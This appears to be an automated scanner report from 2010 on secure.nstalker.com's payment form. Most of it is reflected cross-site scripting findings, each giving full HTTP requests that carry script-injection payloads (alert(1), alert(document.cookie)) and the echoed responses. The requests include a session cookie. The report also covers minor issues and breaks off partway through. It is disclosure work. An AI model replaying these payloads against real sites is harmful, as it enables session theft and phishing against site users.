secure.nstalker.com, XSS, Cross Site Scripting, CWe-79, CAPEC-86

XSS in Payment Form of secure.nstalker.com | Vulnerability Crawler Report

Report generated by XSS.CX at Fri Dec 31 09:51:13 CST 2010.


Contents

Loading

1. Cross-site scripting (reflected)

1.1. https://secure.nstalker.com/shopping/Step3/ [contato parameter]

1.2. https://secure.nstalker.com/shopping/Step3/ [email_contato parameter]

1.3. https://secure.nstalker.com/shopping/Step3/ [empresa parameter]

1.4. https://secure.nstalker.com/shopping/Step3/ [endereco parameter]

1.5. https://secure.nstalker.com/shopping/Step3/ [estado parameter]

1.6. https://secure.nstalker.com/shopping/Step3/ [fax_contato parameter]

1.7. https://secure.nstalker.com/shopping/Step3/ [tel_contato parameter]

1.8. https://secure.nstalker.com/shopping/Step3/ [zip_code parameter]

2. Cross-domain Referer leakage

3. Cross-domain script include

3.1. https://secure.nstalker.com/shopping/

3.2. https://secure.nstalker.com/shopping/Step1/

3.3. https://secure.nstalker.com/shopping/Step2/

3.4. https://secure.nstalker.com/shopping/Step3/

4. Email addresses disclosed

4.1. https://secure.nstalker.com/js/jquery-bgiframe.js

4.2. https://secure.nstalker.com/js/jquery-dimensions.js

4.3. https://secure.nstalker.com/js/jquery-pngFix.js

5. Cacheable HTTPS response

5.1. https://secure.nstalker.com/favicon.ico

5.2. https://secure.nstalker.com/shopping/Step1/getDesc.php

6. HTML does not specify charset

6.1. https://secure.nstalker.com/shopping/Step1/getDesc.php

6.2. https://secure.nstalker.com/shopping/buy_add_to_cart_special.php

7. Content type incorrectly stated

7.1. https://secure.nstalker.com/favicon.ico

7.2. https://secure.nstalker.com/shopping/Step1/getDesc.php



1. Cross-site scripting (reflected)  next
There are 8 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. https://secure.nstalker.com/shopping/Step3/ [contato parameter]  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.nstalker.com
Path:   /shopping/Step3/

Issue detail

The value of the contato request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3cdbe"><script>alert(1)</script>3f18e8eee7ae43394 was submitted in the contato parameter. This input was echoed as 3cdbe\"><script>alert(1)</script>3f18e8eee7ae43394 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /shopping/Step3/?empresa=&contato=3cdbe"><script>alert(1)</script>3f18e8eee7ae43394&email_contato=&endereco=&zip_code=&estado=&pais=US&tel_contato=&fax_contato=&pagto_selecionado=2&validaStep3=1 HTTP/1.1
Host: secure.nstalker.com
Connection: keep-alive
Referer: https://secure.nstalker.com/shopping/Step3/
Cache-Control: max-age=0
Origin: https://secure.nstalker.com
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=110516122.955118389.1293807698.1293807698.1293807698.1; __utmc=110516122; __utmz=110516122.1293807698.1.1.utmccn=(organic)|utmcsr=google|utmctr=n-stalker|utmcmd=organic; __utmb=110516122; PHPSESSID=da7efad5d69bbec2cd726ec4756eabf2

Response

HTTP/1.1 200 OK
Date: Fri, 31 Dec 2010 15:07:40 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
X-Powered-By: PHP/5.2.12
Pragma: no-cache
Keep-Alive: timeout=20, max=300
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 25387

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
   <title>N-Sta
...[SNIP]...
<input type="text" maxlength="100" name="contato" value="3cdbe\"><script>alert(1)</script>3f18e8eee7ae43394" class="gde" />
...[SNIP]...

1.2. https://secure.nstalker.com/shopping/Step3/ [email_contato parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.nstalker.com
Path:   /shopping/Step3/

Issue detail

The value of the email_contato request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b9204"><script>alert(1)</script>00a2f7338d521e56a was submitted in the email_contato parameter. This input was echoed as b9204\"><script>alert(1)</script>00a2f7338d521e56a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /shopping/Step3/?empresa=&contato=&email_contato=b9204"><script>alert(1)</script>00a2f7338d521e56a&endereco=&zip_code=&estado=&pais=US&tel_contato=&fax_contato=&pagto_selecionado=2&validaStep3=1 HTTP/1.1
Host: secure.nstalker.com
Connection: keep-alive
Referer: https://secure.nstalker.com/shopping/Step3/
Cache-Control: max-age=0
Origin: https://secure.nstalker.com
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=110516122.955118389.1293807698.1293807698.1293807698.1; __utmc=110516122; __utmz=110516122.1293807698.1.1.utmccn=(organic)|utmcsr=google|utmctr=n-stalker|utmcmd=organic; __utmb=110516122; PHPSESSID=da7efad5d69bbec2cd726ec4756eabf2

Response

HTTP/1.1 200 OK
Date: Fri, 31 Dec 2010 15:07:44 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
X-Powered-By: PHP/5.2.12
Pragma: no-cache
Keep-Alive: timeout=20, max=300
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 25387

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
   <title>N-Sta
...[SNIP]...
<input type="text" maxlength="50" name="email_contato" value="b9204\"><script>alert(1)</script>00a2f7338d521e56a" class="gde" />
...[SNIP]...

1.3. https://secure.nstalker.com/shopping/Step3/ [empresa parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.nstalker.com
Path:   /shopping/Step3/

Issue detail

The value of the empresa request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d06fe"><script>alert(1)</script>b22a5bda7e95c3c5a was submitted in the empresa parameter. This input was echoed as d06fe\"><script>alert(1)</script>b22a5bda7e95c3c5a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /shopping/Step3/?empresa=d06fe"><script>alert(1)</script>b22a5bda7e95c3c5a&contato=&email_contato=&endereco=&zip_code=&estado=&pais=US&tel_contato=&fax_contato=&pagto_selecionado=2&validaStep3=1 HTTP/1.1
Host: secure.nstalker.com
Connection: keep-alive
Referer: https://secure.nstalker.com/shopping/Step3/
Cache-Control: max-age=0
Origin: https://secure.nstalker.com
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=110516122.955118389.1293807698.1293807698.1293807698.1; __utmc=110516122; __utmz=110516122.1293807698.1.1.utmccn=(organic)|utmcsr=google|utmctr=n-stalker|utmcmd=organic; __utmb=110516122; PHPSESSID=da7efad5d69bbec2cd726ec4756eabf2

Response

HTTP/1.1 200 OK
Date: Fri, 31 Dec 2010 15:07:35 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
X-Powered-By: PHP/5.2.12
Pragma: no-cache
Keep-Alive: timeout=20, max=300
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 25387

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
   <title>N-Sta
...[SNIP]...
<input type="text" maxlength="100" name="empresa" value="d06fe\"><script>alert(1)</script>b22a5bda7e95c3c5a" class="gde" />
...[SNIP]...

1.4. https://secure.nstalker.com/shopping/Step3/ [endereco parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.nstalker.com
Path:   /shopping/Step3/

Issue detail

The value of the endereco request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8535c"><script>alert(1)</script>580c5aa995a14d5f9 was submitted in the endereco parameter. This input was echoed as 8535c\"><script>alert(1)</script>580c5aa995a14d5f9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /shopping/Step3/?empresa=&contato=&email_contato=&endereco=8535c"><script>alert(1)</script>580c5aa995a14d5f9&zip_code=&estado=&pais=US&tel_contato=&fax_contato=&pagto_selecionado=2&validaStep3=1 HTTP/1.1
Host: secure.nstalker.com
Connection: keep-alive
Referer: https://secure.nstalker.com/shopping/Step3/
Cache-Control: max-age=0
Origin: https://secure.nstalker.com
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=110516122.955118389.1293807698.1293807698.1293807698.1; __utmc=110516122; __utmz=110516122.1293807698.1.1.utmccn=(organic)|utmcsr=google|utmctr=n-stalker|utmcmd=organic; __utmb=110516122; PHPSESSID=da7efad5d69bbec2cd726ec4756eabf2

Response

HTTP/1.1 200 OK
Date: Fri, 31 Dec 2010 15:07:48 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
X-Powered-By: PHP/5.2.12
Pragma: no-cache
Keep-Alive: timeout=20, max=300
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 25387

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
   <title>N-Sta
...[SNIP]...
<input type="text" maxlength="100" name="endereco" value="8535c\"><script>alert(1)</script>580c5aa995a14d5f9" class="gde" />
...[SNIP]...

1.5. https://secure.nstalker.com/shopping/Step3/ [estado parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.nstalker.com
Path:   /shopping/Step3/

Issue detail

The value of the estado request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72a20"><script>alert(1)</script>8d067d33502e8e20f was submitted in the estado parameter. This input was echoed as 72a20\"><script>alert(1)</script>8d067d33502e8e20f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /shopping/Step3/?empresa=&contato=&email_contato=&endereco=&zip_code=&estado=72a20"><script>alert(1)</script>8d067d33502e8e20f&pais=US&tel_contato=&fax_contato=&pagto_selecionado=2&validaStep3=1 HTTP/1.1
Host: secure.nstalker.com
Connection: keep-alive
Referer: https://secure.nstalker.com/shopping/Step3/
Cache-Control: max-age=0
Origin: https://secure.nstalker.com
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=110516122.955118389.1293807698.1293807698.1293807698.1; __utmc=110516122; __utmz=110516122.1293807698.1.1.utmccn=(organic)|utmcsr=google|utmctr=n-stalker|utmcmd=organic; __utmb=110516122; PHPSESSID=da7efad5d69bbec2cd726ec4756eabf2

Response

HTTP/1.1 200 OK
Date: Fri, 31 Dec 2010 15:07:54 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
X-Powered-By: PHP/5.2.12
Pragma: no-cache
Keep-Alive: timeout=20, max=300
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 25387

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
   <title>N-Sta
...[SNIP]...
<input type="text" maxlength="20" name="estado" value="72a20\"><script>alert(1)</script>8d067d33502e8e20f" class="mde" />
...[SNIP]...

1.6. https://secure.nstalker.com/shopping/Step3/ [fax_contato parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.nstalker.com
Path:   /shopping/Step3/

Issue detail

The value of the fax_contato request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 46ada"><script>alert(1)</script>e2f4726d27668455d was submitted in the fax_contato parameter. This input was echoed as 46ada\"><script>alert(1)</script>e2f4726d27668455d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /shopping/Step3/?empresa=&contato=&email_contato=&endereco=&zip_code=&estado=&pais=US&tel_contato=&fax_contato=46ada"><script>alert(1)</script>e2f4726d27668455d&pagto_selecionado=2&validaStep3=1 HTTP/1.1
Host: secure.nstalker.com
Connection: keep-alive
Referer: https://secure.nstalker.com/shopping/Step3/
Cache-Control: max-age=0
Origin: https://secure.nstalker.com
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=110516122.955118389.1293807698.1293807698.1293807698.1; __utmc=110516122; __utmz=110516122.1293807698.1.1.utmccn=(organic)|utmcsr=google|utmctr=n-stalker|utmcmd=organic; __utmb=110516122; PHPSESSID=da7efad5d69bbec2cd726ec4756eabf2

Response

HTTP/1.1 200 OK
Date: Fri, 31 Dec 2010 15:07:57 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
X-Powered-By: PHP/5.2.12
Pragma: no-cache
Keep-Alive: timeout=20, max=300
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 25387

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
   <title>N-Sta
...[SNIP]...
<input type="text" maxlength="20" name="fax_contato" value="46ada\"><script>alert(1)</script>e2f4726d27668455d" class="mde" />
...[SNIP]...

1.7. https://secure.nstalker.com/shopping/Step3/ [tel_contato parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.nstalker.com
Path:   /shopping/Step3/

Issue detail

The value of the tel_contato request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7ac58"><script>alert(1)</script>4c591e5b027ee3722 was submitted in the tel_contato parameter. This input was echoed as 7ac58\"><script>alert(1)</script>4c591e5b027ee3722 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /shopping/Step3/?empresa=&contato=&email_contato=&endereco=&zip_code=&estado=&pais=US&tel_contato=7ac58"><script>alert(1)</script>4c591e5b027ee3722&fax_contato=&pagto_selecionado=2&validaStep3=1 HTTP/1.1
Host: secure.nstalker.com
Connection: keep-alive
Referer: https://secure.nstalker.com/shopping/Step3/
Cache-Control: max-age=0
Origin: https://secure.nstalker.com
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=110516122.955118389.1293807698.1293807698.1293807698.1; __utmc=110516122; __utmz=110516122.1293807698.1.1.utmccn=(organic)|utmcsr=google|utmctr=n-stalker|utmcmd=organic; __utmb=110516122; PHPSESSID=da7efad5d69bbec2cd726ec4756eabf2

Response

HTTP/1.1 200 OK
Date: Fri, 31 Dec 2010 15:07:56 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
X-Powered-By: PHP/5.2.12
Pragma: no-cache
Keep-Alive: timeout=20, max=300
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 25387

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
   <title>N-Sta
...[SNIP]...
<input type="text" maxlength="20" name="tel_contato" value="7ac58\"><script>alert(1)</script>4c591e5b027ee3722" class="mde" />
...[SNIP]...

1.8. https://secure.nstalker.com/shopping/Step3/ [zip_code parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.nstalker.com
Path:   /shopping/Step3/

Issue detail

The value of the zip_code request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 98482"><script>alert(1)</script>db77c5e842cef3185 was submitted in the zip_code parameter. This input was echoed as 98482\"><script>alert(1)</script>db77c5e842cef3185 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /shopping/Step3/?empresa=&contato=&email_contato=&endereco=&zip_code=98482"><script>alert(1)</script>db77c5e842cef3185&estado=&pais=US&tel_contato=&fax_contato=&pagto_selecionado=2&validaStep3=1 HTTP/1.1
Host: secure.nstalker.com
Connection: keep-alive
Referer: https://secure.nstalker.com/shopping/Step3/
Cache-Control: max-age=0
Origin: https://secure.nstalker.com
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=110516122.955118389.1293807698.1293807698.1293807698.1; __utmc=110516122; __utmz=110516122.1293807698.1.1.utmccn=(organic)|utmcsr=google|utmctr=n-stalker|utmcmd=organic; __utmb=110516122; PHPSESSID=da7efad5d69bbec2cd726ec4756eabf2

Response

HTTP/1.1 200 OK
Date: Fri, 31 Dec 2010 15:07:52 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
X-Powered-By: PHP/5.2.12
Pragma: no-cache
Keep-Alive: timeout=20, max=300
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 25387

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
   <title>N-Sta
...[SNIP]...
<input type="text" maxlength="15" name="zip_code" value="98482\"><script>alert(1)</script>db77c5e842cef3185" class="mde" />
...[SNIP]...

2. Cross-domain Referer leakage  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.nstalker.com
Path:   /shopping/Step3/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.

Request

POST /shopping/Step3/?empresa=&contato=d06fe%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb22a5bda7e95c3c5&email_contato=8535c%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E580c5aa995a14d5f9&endereco=&zip_code=98482%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Edb77c5e842cef3185&estado=&pais=US&tel_contato=7ac58%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E4c591e5b027ee3722&fax_contato=46ada%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ee2f4726d27668455&pagto_selecionado=2&validaStep3=1 HTTP/1.1
Host: secure.nstalker.com
Connection: keep-alive
Referer: https://secure.nstalker.com/shopping/Step3/?empresa=&contato=d06fe%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb22a5bda7e95c3c5&email_contato=8535c%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E580c5aa995a14d5f9&endereco=&zip_code=98482%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Edb77c5e842cef3185&estado=&pais=US&tel_contato=7ac58%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E4c591e5b027ee3722&fax_contato=46ada%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ee2f4726d27668455&pagto_selecionado=2&validaStep3=1
Cache-Control: max-age=0
Origin: https://secure.nstalker.com
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=110516122.1293807698.1.1.utmccn=(organic)|utmcsr=google|utmctr=n-stalker|utmcmd=organic; PHPSESSID=da7efad5d69bbec2cd726ec4756eabf2; __utma=110516122.955118389.1293807698.1293807698.1293810152.2; __utmc=110516122; __utmb=110516122
Content-Length: 356

empresa=d06fe%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3Eb22a5bda7e95c3c5&contato=d06fe%5C&email_contato=8535c%5C&endereco=d06fe%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Fri, 31 Dec 2010 15:50:04 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
X-Powered-By: PHP/5.2.12
Pragma: no-cache
Keep-Alive: timeout=20, max=300
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 25961

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
   <title>N-Sta
...[SNIP]...
<![endif]-->

       <script src="https://ssl.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

3. Cross-domain script include  previous  next
There are 4 instances of this issue:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.


3.1. https://secure.nstalker.com/shopping/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.nstalker.com
Path:   /shopping/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /shopping/ HTTP/1.1
Host: secure.nstalker.com
Connection: keep-alive
Referer: https://customer.nstalker.com/cc/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=110516122.955118389.1293807698.1293807698.1293807698.1; __utmc=110516122; __utmz=110516122.1293807698.1.1.utmccn=(organic)|utmcsr=google|utmctr=n-stalker|utmcmd=organic; __utmb=110516122; PHPSESSID=da7efad5d69bbec2cd726ec4756eabf2

Response

HTTP/1.1 200 OK
Date: Fri, 31 Dec 2010 15:02:41 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
X-Powered-By: PHP/5.2.12
Pragma: no-cache
Keep-Alive: timeout=20, max=300
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 12619

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
   <title>N-Sta
...[SNIP]...
